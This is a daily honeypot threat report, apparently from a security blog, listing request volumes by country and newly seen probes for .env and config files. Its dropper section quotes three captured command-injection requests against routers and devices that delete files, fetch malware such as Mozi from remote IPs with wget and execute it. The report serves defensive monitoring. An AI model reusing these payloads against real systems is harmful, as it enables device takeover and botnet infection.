Skip to main content
  1. Daily-Posts/

Report: 2025-08-16

·329 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-16
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 14 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2202 requests were recorded during the day, originating from 3 different countries, with a peak of 1759 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SGGermany
SGGermany
USGermany
DEGermany
USGermany
GBGermany
GBDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
123.13.107.189GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.13.107.189:48235/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
8.219.136.157GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
141.98.11.44POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20axis.arm7l%3B%20wget%20http%3A%2F%2F198.251.89.190%2Faxe%2Faxis.arm7l%3B%20chmod%20%2Bx%20axis.arm7l%3B%20.%2Faxis.arm7l%20tbk HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
7041GET /env/config.log HTTP/1.1
7241GET /docs/.env.save HTTP/1.1
7251GET /docs/.env.smtp HTTP/1.1
7261GET /download/.env~ HTTP/1.1
7271GET /django/env.php HTTP/1.1
7281GET /django/env.yml HTTP/1.1
7301GET /docs/.env.test HTTP/1.1
9031GET /core/.env.save HTTP/1.1
9051GET /docs/.env.conf HTTP/1.1
9071GET /core/.env.smtp HTTP/1.1
9081GET /core/.env.test HTTP/1.1
9091GET /mail/.env.conf HTTP/1.1
9101GET /docs/.env.prod HTTP/1.1
9111GET /logs/temp/.env HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
01759GB
1198US
273DE
334IR
421BG
514SC
613LT
712CA
811ZA
99PL
109RO
117NL
126SG
136UA
144TR
154BR
164PT
174IN
183JP
192VN
202RU
212CN
222BE
231AU
241MC
251KR

Related

Report: 2025-08-15
·2637 words
Repport Daily
Report: 2025-08-14
·253 words
Repport Daily
Report: 2025-08-13
·309 words
Repport Daily